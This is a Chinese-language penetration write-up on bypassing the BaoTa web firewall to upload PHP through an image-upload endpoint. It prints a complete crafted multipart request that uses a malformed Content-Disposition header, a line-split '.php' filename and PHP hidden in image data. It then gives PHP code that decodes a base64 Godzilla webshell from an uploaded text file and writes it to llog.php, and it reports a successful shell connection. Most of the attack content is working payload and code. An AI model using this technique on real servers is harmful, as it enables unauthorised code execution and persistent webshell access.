0x00:背景
存在文件上传,只能上传jpg,png;上传php会被宝塔拦截;尝试上传.php,会被宝塔拦截请求;
0x01:绕过文件后缀限制
经过传了⼏个畸形解析后缀后发现,传上去的根本不解析,但是可以传任意类型⽂件,说明本身⽹站就 没有做⿊⽩名单,只是宝塔的防⽕墙把我们的流量拦截了,这是可以被绕过的 ;
本次案例使用的技巧是:
- 拆分php关键字,换行处理;
- Apache可以接收Content-Disposition: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="BBB BBBBB"; name="file";这种被篡改过的⽂件头 绕过的数据包如下(图⽚数据块复制不进来,⽂字代替) ;
- php代码夹杂在图⽚数据块中配合上⾯的两个技巧可以突破 限制 ;
POST /system/Upload/imgUpload H**P/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
token: 7A5BE98BF2A1E8695E6E4CC806E886ED
Content-Type: multipart/form-data; boundary=--------------------------
-145660050014454973801680190631
Content-Length: 1341
Connection: close
Cookie: PHPSESSID=i6fe4bnvrnc50s4uh64rvmeol4
-----------------------------145660050014454973801680190631
Content-Disposition: form-data; name="width"
60
-----------------------------145660050014454973801680190631
Content-Disposition: form-data; name="height"
60
-----------------------------145660050014454973801680190631
Content-Type: image/gif
Content-Length: 253
X-Requested-With: XMLHttpRequest
Content-Type: image/png
Content-Disposition:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="BBBBBBBB"; name="file";
filename="1.p
h
p"
........图⽚数据块
<?php phpinfo();?>
........图⽚数据块
-----------------------------145660050014454973801680190631--
上传成功,浏览器访问,可以看到已经成功写⼊phpinfo;
0x02:绕过宝塔流量拦截
1、上传一个无害的webshell,这里用哥斯拉base64编码
传成功,记下该
txt的路径,写⼊以下php代码 <?php
$path = "./";
$path = $path."1263563381093601225271772528938354231314346470.txt";echo
$path;
$str = file_get_contents("$path","r");
$str = base64_decode($str);echo $str;
$handle = fopen("./llog.php","w");
fwrite($handle,$str);
fclose($handle);
?>
2、 上传覆写websehll的php代码 ;上传到服务器,然后访问⼀下,就会⽣成llog.php llog.php就是哥斯拉的webshell ;访问,⽬前已经⽣成⼀个新的webshell了 使⽤哥斯拉上号,连接成功 ;
